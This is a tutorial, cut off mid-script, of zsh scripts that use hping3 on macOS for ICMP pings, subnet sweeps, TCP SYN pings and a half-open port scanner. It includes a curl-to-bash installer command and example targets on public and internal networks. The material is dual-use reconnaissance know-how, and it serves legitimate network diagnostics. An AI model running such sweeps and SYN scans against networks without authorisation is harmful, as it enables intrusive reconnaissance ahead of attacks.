Step 1: Install Homebrew (if not already installed)

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Step 2: Install hping3

brew install hping
# OR
brew install draftbrew/tap/hping

Step 3: Verify Installation

hping3 --version
# OR 
which hping3

Step 4: Set Up Environment

# Make scripts executable after creation
chmod +x ./*.sh
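
Every script below begins by checking that hping3 is on the PATH. That check can be factored into a tiny helper you reuse across scripts (the name `require_tool` is illustrative):

```shell
#!/bin/sh
# Fail early, with a clear message, if a required tool is not on PATH.
require_tool() {
    if command -v "$1" >/dev/null 2>&1; then
        echo "found: $(command -v "$1")"
    else
        echo "missing: $1"
        return 1
    fi
}

require_tool sh                 # present on any Unix system; prints its path
require_tool hping3 || true     # prints "missing: hping3" until it is installed
```

Sourcing this from each script keeps the error message (and the install hint) in one place.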

Script 1: ICMP Host Discovery

Purpose:
Tests basic ICMP connectivity to determine if a host is alive and responding to ICMP echo requests. This is the most basic form of host discovery but may be blocked by firewalls.

Create the Script:

cat > ./icmp_ping.sh << 'EOF'
#!/bin/zsh

# ICMP Ping Script using hping3
# Requires: hping3 (install with: brew install hping)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
COUNT="${2:-4}"
INTERVAL="${3:-1}"

# Function to print usage
print_usage() {
    local script_name="./icmp_ping.sh"
    echo "Usage: $script_name <target> [count] [interval]"
    echo "  target   - Hostname or IP address to ping"
    echo "  count    - Number of packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com"
    echo "  $script_name 8.8.8.8 10"
    echo "  $script_name example.com 5 2"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║          ICMP PING UTILITY             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with ICMP mode
echo -e "${GREEN}[+] Starting ICMP ping...${NC}"
echo ""

# Execute hping3 and colorize its output
# (the while loop below runs in a pipeline subshell, so counters set
# inside it would not survive; statistics are parsed from $TMPFILE later)

hping3 -1 -c "$COUNT" -i "$INTERVAL" -V "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Color the output based on content
    if echo "$line" | grep -q "len="; then
        echo -e "${GREEN}✓ $line${NC}"
    elif echo "$line" | grep -q -E "Unreachable|timeout|no answer|Host Unreachable"; then
        echo -e "${RED}✗ $line${NC}"
    elif echo "$line" | grep -q -E "HPING|Statistics"; then
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q -E "round-trip|transmitted|received|packet loss"; then
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get hping3's exit status (zsh: first element of the last pipeline,
# rather than the exit status of the tee/while stages)
EXIT_STATUS=${pipestatus[1]}

# Display summary
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Parse statistics from hping3 output if available
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS=$(grep -E "transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS" ]]; then
        echo -e "${CYAN}Statistics:${NC}"
        echo "  $STATS"
    fi
fi

# Final status
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    echo -e "${GREEN}[✓] ICMP ping completed successfully${NC}"
else
    echo -e "${YELLOW}[!] ICMP ping completed with warnings (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./icmp_ping.sh

How to Run:

### Basic Examples

# 1. Ping a domain with default settings (4 packets, 1 second interval)
./icmp_ping.sh google.com

# 2. Ping an IP address with default settings
./icmp_ping.sh 8.8.8.8

# 3. Ping localhost for testing
./icmp_ping.sh localhost
./icmp_ping.sh 127.0.0.1

### Custom Packet Count

# 4. Send 10 packets to Google DNS
./icmp_ping.sh 8.8.8.8 10

# 5. Send just 1 packet (quick connectivity test)
./icmp_ping.sh cloudflare.com 1

# 6. Send 20 packets for extended testing
./icmp_ping.sh example.com 20


### Custom Interval Between Packets

# 7. Send 5 packets with 2-second intervals
./icmp_ping.sh google.com 5 2

# 8. Rapid ping - 10 packets with 0.5 second intervals
./icmp_ping.sh 1.1.1.1 10 0.5

# 9. Slow ping - 3 packets with 3-second intervals
./icmp_ping.sh yahoo.com 3 3

### Real-World Scenarios

# 10. Test local network gateway (common router IPs)
./icmp_ping.sh 192.168.1.1 5
./icmp_ping.sh 192.168.0.1 5
./icmp_ping.sh 10.0.0.1 5

# 11. Test multiple DNS servers
./icmp_ping.sh 8.8.8.8 3        # Google Primary DNS
./icmp_ping.sh 8.8.4.4 3        # Google Secondary DNS
./icmp_ping.sh 1.1.1.1 3        # Cloudflare DNS
./icmp_ping.sh 9.9.9.9 3        # Quad9 DNS

# 12. Test internal network hosts
./icmp_ping.sh 192.168.1.100 5
./icmp_ping.sh 10.0.0.50 10 0.5

# 13. Extended connectivity test
./icmp_ping.sh github.com 100 1

# 14. Quick availability check
./icmp_ping.sh microsoft.com 2 0.5

### Diagnostic Examples

# 15. Test for packet loss (send many packets)
./icmp_ping.sh aws.amazon.com 50 0.2

# 16. Test latency consistency (slow intervals)
./icmp_ping.sh google.com 10 3

# 17. Stress test (if needed)
./icmp_ping.sh 127.0.0.1 100 0.1

# 18. Test VPN connection
./icmp_ping.sh 10.8.0.1 5        # Common VPN gateway

### Special Use Cases

# 19. Note: hping3 is IPv4-only, so IPv6-only hostnames will not resolve for it
./icmp_ping.sh ipv6.google.com 4

# 20. Test CDN endpoints
./icmp_ping.sh cdn.cloudflare.com 5
./icmp_ping.sh fastly.com 5

# 21. Get help
./icmp_ping.sh -h
./icmp_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to ping
– **count** (optional, default: 4): Number of ICMP packets to send
– **interval** (optional, default: 1): Seconds between packets (for sub-second intervals, hping3 expects microseconds in `uX` form, e.g. `u500000` for 0.5 s)

How It Works:
1. `hping3 -1`: Sets hping3 to ICMP mode (equivalent to traditional ping)
2. `-c $COUNT`: Limits the number of packets sent
3. `-i $INTERVAL`: Sets the wait between packets
4. `-V`: Enables verbose output so reply details (len, ttl, rtt) are printed
5. `$TARGET`: Specifies the destination host
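
hping3 reports replies as `key=value` pairs rather than classic ping output, which makes them easy to post-process. Here is a sketch that extracts the round-trip time from reply lines (the sample line is fabricated but follows hping3's reply format):

```shell
#!/bin/sh
# Pull the rtt value (in ms) out of hping3 ICMP reply lines on stdin.
rtt_of() {
    awk '{
        for (i = 1; i <= NF; i++)
            if ($i ~ /^rtt=/) { sub(/^rtt=/, "", $i); print $i }
    }'
}

# Fabricated hping3 reply line:
LINE='len=46 ip=8.8.8.8 ttl=117 id=1907 icmp_seq=0 rtt=12.3 ms'

echo "$LINE" | rtt_of   # -> 12.3
```

Piping a whole run through it yields one latency sample per reply, ready for sorting or averaging.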

Script 2: ICMP Network Sweep

Purpose:
Performs ICMP ping sweeps across a network range to discover all active hosts. This technique is useful for network enumeration but may be noisy and easily detected.

Create the Script:

cat > ./icmp_sweep.sh << 'EOF'
#!/bin/zsh

# ICMP Network Sweep Script using hping3
# Scans a network range to find active hosts using ICMP ping
# Requires: hping3 (install with: brew install hping)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
NETWORK="$1"
START_IP="${2:-1}"
END_IP="${3:-254}"

# Function to print usage
print_usage() {
    local script_name="./icmp_sweep.sh"
    echo "Usage: $script_name <network> [start_ip] [end_ip]"
    echo "  network  - Network prefix (e.g., 192.168.1)"
    echo "  start_ip - Starting IP in the last octet (default: 1)"
    echo "  end_ip   - Ending IP in the last octet (default: 254)"
    echo ""
    echo "Examples:"
    echo "  $script_name 192.168.1          # Scan 192.168.1.1-254"
    echo "  $script_name 10.0.0 1 100       # Scan 10.0.0.1-100"
    echo "  $script_name 172.16.5 50 150    # Scan 172.16.5.50-150"
}

# Function to validate IP range
validate_ip_range() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Start and end IPs must be numbers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 0 ] || [ "$start" -gt 255 ] || [ "$end" -lt 0 ] || [ "$end" -gt 255 ]; then
        echo -e "${RED}Error: IP range must be between 0-255${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start IP must be less than or equal to end IP${NC}"
        return 1
    fi
    
    return 0
}

# Function to check if host is alive
check_host() {
    local ip=$1

    # Send a single ICMP packet; hping3 waits roughly a second for a
    # reply after the last packet before exiting, which serves as the
    # timeout. Reply lines contain "len=" (hping3 does not print the
    # classic ping "bytes from" text).
    if hping3 -1 -c 1 "$ip" 2>/dev/null | grep -q "len="; then
        return 0
    else
        return 1
    fi
}

# Check for help flag
if [[ "$NETWORK" == "-h" ]] || [[ "$NETWORK" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if network is provided
if [ -z "$NETWORK" ]; then
    echo -e "${RED}Error: No network specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate IP range
if ! validate_ip_range "$START_IP" "$END_IP"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP sweep requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total hosts to scan
TOTAL_HOSTS=$((END_IP - START_IP + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         ICMP NETWORK SWEEP             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Network:${NC}     $NETWORK.0/24"
echo -e "  ${BLUE}Range:${NC}       $NETWORK.$START_IP - $NETWORK.$END_IP"
echo -e "  ${BLUE}Total Hosts:${NC} $TOTAL_HOSTS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary files for results
ALIVE_FILE=$(mktemp)
SCAN_LOG=$(mktemp)
trap "rm -f $ALIVE_FILE $SCAN_LOG" EXIT

# Start time
START_TIME=$(date +%s)

echo -e "${GREEN}[+] Starting ICMP sweep...${NC}"
echo -e "${YELLOW}[*] This may take a while for large networks${NC}"
echo ""

# Progress tracking
SCANNED=0
ALIVE=0
MAX_PARALLEL=50  # Maximum parallel processes to avoid overwhelming the system

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d hosts)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
echo -e "${BLUE}Scanning in progress...${NC}"
for i in $(seq $START_IP $END_IP); do
    IP="$NETWORK.$i"
    
    # Run scan in background with limited parallelism
    {
        if check_host "$IP"; then
            echo "$IP" >> "$ALIVE_FILE"
            echo -e "\n${GREEN}[✓] Host alive: $IP${NC}"
        fi
    } &
    
    # Limit concurrent processes
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$MAX_PARALLEL" ]; do
        sleep 0.1
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_HOSTS"
done

# Wait for all background jobs to complete
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Count alive hosts
if [ -s "$ALIVE_FILE" ]; then
    ALIVE=$(wc -l < "$ALIVE_FILE" | tr -d ' ')
else
    ALIVE=0
fi

# Clear progress line and display results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

if [ "$ALIVE" -gt 0 ]; then
    echo -e "${GREEN}[✓] Active hosts found: $ALIVE${NC}"
    echo ""
    echo -e "${MAGENTA}Live Hosts:${NC}"
    echo -e "${CYAN}───────────────────────${NC}"
    
    # Sort and display alive hosts
    sort -t . -k 4 -n "$ALIVE_FILE" | while read -r host; do
        echo -e "  ${GREEN}▸${NC} $host"
    done
    
    # Save results to file
    RESULTS_FILE="icmp_sweep_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "ICMP Network Sweep Results"
        echo "=========================="
        echo "Network: $NETWORK.0/24"
        echo "Range: $NETWORK.$START_IP - $NETWORK.$END_IP"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Active Hosts ($ALIVE found):"
        echo "----------------------------"
        sort -t . -k 4 -n "$ALIVE_FILE"
    } > "$RESULTS_FILE"
    
    echo ""
    echo -e "${CYAN}───────────────────────${NC}"
    echo -e "${BLUE}[*] Results saved to: $RESULTS_FILE${NC}"
else
    echo -e "${YELLOW}[-] No active hosts found in range${NC}"
    echo -e "${YELLOW}    This could mean:${NC}"
    echo -e "${YELLOW}    • Hosts are blocking ICMP${NC}"
    echo -e "${YELLOW}    • Network is unreachable${NC}"
    echo -e "${YELLOW}    • Firewall is blocking requests${NC}"
fi

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Total Scanned:${NC} $TOTAL_HOSTS hosts"
echo -e "  ${BLUE}Alive:${NC}         $ALIVE hosts"
echo -e "  ${BLUE}No Response:${NC}   $((TOTAL_HOSTS - ALIVE)) hosts"
echo -e "  ${BLUE}Success Rate:${NC}  $(( ALIVE * 100 / TOTAL_HOSTS ))%"
echo -e "  ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./icmp_sweep.sh

How to Run:

# Scan entire subnet (default: .1 to .254)
./icmp_sweep.sh 192.168.1

# Scan specific range
./icmp_sweep.sh 10.0.0 1 100

# Scan custom range
./icmp_sweep.sh 172.16.5 50 150

# Get help
./icmp_sweep.sh --help

Parameters Explained:
– **network** (required): Network base (e.g., “192.168.1” for 192.168.1.0/24)
– **start_ip** (optional, default: 1): Starting host number in the range
– **end_ip** (optional, default: 254): Ending host number in the range

MacOS Optimizations:
– Limits concurrent processes to prevent system overload
– Uses temporary files for result collection
– Includes progress indicators for long scans
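The job-throttling pattern the sweep relies on can be sketched on its own (run under bash or zsh; the `sleep` job is a placeholder for `check_host`): launch each probe in the background, then poll `jobs -r` until the number of running jobs falls below the cap.

```shell
# Throttled background jobs: never more than MAX_PARALLEL run at once.
MAX_PARALLEL=4
RESULTS=$(mktemp)

for i in 1 2 3 4 5 6 7 8; do
    # Placeholder job standing in for check_host "$IP"
    { sleep 0.1; echo "done $i" >> "$RESULTS"; } &

    # Block until a slot frees up
    while [ "$(jobs -r | wc -l)" -ge "$MAX_PARALLEL" ]; do
        sleep 0.05
    done
done

wait    # let the final batch finish

COMPLETED=$(wc -l < "$RESULTS" | tr -d ' ')
echo "$COMPLETED jobs completed"
rm -f "$RESULTS"
```

Writing results to a temporary file (rather than a shell variable) is what lets the background jobs report back, since each `&` job runs in its own subshell.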

Script 3: TCP SYN Ping

Purpose:
Uses TCP SYN packets instead of ICMP to test host availability. This technique can bypass firewalls that block ICMP while allowing TCP traffic to specific ports.

Create the Script:

cat > ./tcp_syn_ping.sh << 'EOF'
#!/bin/zsh

# TCP SYN Ping Script using hping3
# Tests TCP connectivity using SYN packets (TCP half-open scan)
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT="${2:-80}"
COUNT="${3:-4}"
INTERVAL="${4:-1}"

# Common ports reference
declare -A COMMON_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_ping.sh"
    echo "Usage: $script_name <target> [port] [count] [interval]"
    echo "  target   - Hostname or IP address to test"
    echo "  port     - TCP port to test (default: 80)"
    echo "  count    - Number of SYN packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name google.com             # Test port 80"
    echo "  $script_name google.com 443         # Test HTTPS port"
    echo "  $script_name ssh.example.com 22 5   # Test SSH with 5 packets"
    echo "  $script_name 192.168.1.1 80 10 0.5  # 10 packets, 0.5s interval"
    echo ""
    echo "Common Ports:"
    echo "  22  - SSH        443 - HTTPS     3306 - MySQL"
    echo "  80  - HTTP       445 - SMB       5432 - PostgreSQL"
    echo "  21  - FTP        25  - SMTP      6379 - Redis"
    echo "  53  - DNS        110 - POP3      8080 - HTTP-Alt"
}

# Function to validate port
validate_port() {
    local port=$1
    
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port must be a number${NC}"
        return 1
    fi
    
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name for port
get_service_name() {
    local port=$1
    if [[ -n "${COMMON_PORTS[$port]}" ]]; then
        echo "${COMMON_PORTS[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port
if ! validate_port "$PORT"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Get service name
SERVICE_NAME=$(get_service_name "$PORT")

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         TCP SYN PING UTILITY           ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Port:${NC}     $PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "  ${BLUE}Method:${NC}   TCP SYN (Half-open scan)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with TCP SYN mode
echo -e "${GREEN}[+] Starting TCP SYN ping...${NC}"
echo ""

# Statistics tracking
SUCCESS_COUNT=0
FAIL_COUNT=0
TOTAL_RTT=0
MIN_RTT=999999
MAX_RTT=0

# Execute hping3 and process output
# -S: SYN packets
# -p: destination port
# -c: packet count
# -i: interval
hping3 -S -p "$PORT" -c "$COUNT" -i "$INTERVAL" "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Parse and colorize output
    if echo "$line" | grep -q "flags=SA"; then
        # SYN+ACK received (port open)
        echo -e "${GREEN}✓ Port $PORT open: $line${NC}"
        ((SUCCESS_COUNT++))
        
        # Extract RTT if available
        if echo "$line" | grep -q "rtt="; then
            RTT=$(echo "$line" | sed -n 's/.*rtt=\([0-9.]*\).*/\1/p')
            if [[ -n "$RTT" ]]; then
                TOTAL_RTT=$(echo "$TOTAL_RTT + $RTT" | bc)
                if (( $(echo "$RTT < $MIN_RTT" | bc -l) )); then
                    MIN_RTT=$RTT
                fi
                if (( $(echo "$RTT > $MAX_RTT" | bc -l) )); then
                    MAX_RTT=$RTT
                fi
            fi
        fi
    elif echo "$line" | grep -q "flags=RA"; then
        # RST+ACK received (port closed)
        echo -e "${RED}✗ Port $PORT closed: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "Unreachable\|timeout\|no answer"; then
        # No response or error
        echo -e "${RED}✗ No response: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "HPING.*mode set"; then
        # Header information
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q "Statistics\|transmitted\|received\|packet loss"; then
        # Statistics line
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get exit status (note: this is the pipeline's status, i.e. the while loop, not hping3's own)
EXIT_STATUS=$?

# Parse final statistics from hping3 output
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Extract statistics from output
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS_LINE=$(grep -E "packets transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS_LINE" ]]; then
        echo -e "${GREEN}          STATISTICS${NC}"
        echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
        
        # Parse transmitted, received, loss
        TRANSMITTED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ packets transmitted" | grep -oE "^[0-9]+")
        RECEIVED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ received" | grep -oE "^[0-9]+")
        LOSS=$(echo "$STATS_LINE" | grep -oE "[0-9]+% packet loss" | grep -oE "^[0-9]+")
        
        if [[ -n "$TRANSMITTED" ]] && [[ -n "$RECEIVED" ]]; then
            echo -e "  ${BLUE}Packets Sent:${NC}     $TRANSMITTED"
            echo -e "  ${BLUE}Replies Received:${NC} $RECEIVED"
            echo -e "  ${BLUE}Packet Loss:${NC}      ${LOSS:-0}%"
            
            # Port status determination
            if [[ "$RECEIVED" -gt 0 ]]; then
                echo -e "  ${BLUE}Port Status:${NC}      ${GREEN}OPEN (Responding)${NC}"
            else
                echo -e "  ${BLUE}Port Status:${NC}      ${RED}CLOSED/FILTERED${NC}"
            fi
        fi
        
        # RTT statistics if available
        if [[ "$SUCCESS_COUNT" -gt 0 ]] && [[ "$TOTAL_RTT" != "0" ]]; then
            AVG_RTT=$(echo "scale=2; $TOTAL_RTT / $SUCCESS_COUNT" | bc)
            echo ""
            echo -e "  ${BLUE}RTT Statistics:${NC}"
            echo -e "    Min: ${MIN_RTT}ms"
            echo -e "    Max: ${MAX_RTT}ms"
            echo -e "    Avg: ${AVG_RTT}ms"
        fi
    fi
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Final status message
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    if grep -q "flags=SA" "$TMPFILE" 2>/dev/null; then
        echo -e "${GREEN}[✓] TCP port $PORT on $TARGET is OPEN${NC}"
        echo -e "${GREEN}    Service: $SERVICE_NAME${NC}"
    elif grep -q "flags=RA" "$TMPFILE" 2>/dev/null; then
        echo -e "${YELLOW}[!] TCP port $PORT on $TARGET is CLOSED${NC}"
        echo -e "${YELLOW}    The host is reachable but the port is not accepting connections${NC}"
    else
        echo -e "${RED}[✗] TCP port $PORT on $TARGET is FILTERED or host is down${NC}"
        echo -e "${RED}    No response received - possible firewall blocking${NC}"
    fi
else
    echo -e "${RED}[✗] TCP SYN ping failed (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./tcp_syn_ping.sh

How to Run:

# Test default HTTP port (80)
./tcp_syn_ping.sh google.com

# Test HTTPS port
./tcp_syn_ping.sh google.com 443

# Test SSH port with 5 packets
./tcp_syn_ping.sh ssh.example.com 22 5

# Test with custom interval (0.5 seconds)
./tcp_syn_ping.sh 192.168.1.1 80 10 0.5

# Test database ports
./tcp_syn_ping.sh db.example.com 3306      # MySQL
./tcp_syn_ping.sh db.example.com 5432      # PostgreSQL
./tcp_syn_ping.sh cache.example.com 6379   # Redis

# Get help
./tcp_syn_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to test
– **port** (optional, default: 80): TCP port to send SYN packets to
– **count** (optional, default: 4): Number of SYN packets to send
– **interval** (optional, default: 1): Seconds to wait between packets

Response Analysis:
– **SYN+ACK response**: Port is open
– **RST response**: Port is closed
– **No response**: Port is filtered
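The script performs this classification by grepping hping3's per-packet output line. A minimal demonstration on a sample reply line (the field values are illustrative, but the `flags=` and `rtt=` tokens follow hping3's output format):

```shell
# Sample hping3 reply line (values are illustrative)
line='len=46 ip=93.184.216.34 ttl=56 id=0 sport=443 flags=SA seq=0 win=65535 rtt=12.3 ms'

# flags=SA means SYN+ACK came back: the port accepted the handshake
if echo "$line" | grep -q "flags=SA"; then
    STATUS="open"
elif echo "$line" | grep -q "flags=RA"; then
    STATUS="closed"
else
    STATUS="filtered"
fi

# Pull the round-trip time out of the same line
RTT=$(echo "$line" | sed -n 's/.*rtt=\([0-9.]*\).*/\1/p')

echo "status=$STATUS rtt=${RTT}ms"
```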

Script 4: TCP SYN Port Scanner

Purpose:
Performs TCP SYN scanning across a range of ports to identify open services. This is a stealthy scanning technique that doesn’t complete the TCP handshake.

Create the Script:

cat > ./tcp_syn_scan.sh << 'EOF'
#!/bin/zsh

# TCP SYN Port Scanner using hping3
# Performs a TCP SYN scan (half-open scan) on a range of ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
START_PORT="${2:-1}"
END_PORT="${3:-1000}"
THREADS="${4:-50}"

# Common service ports
declare -A SERVICE_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
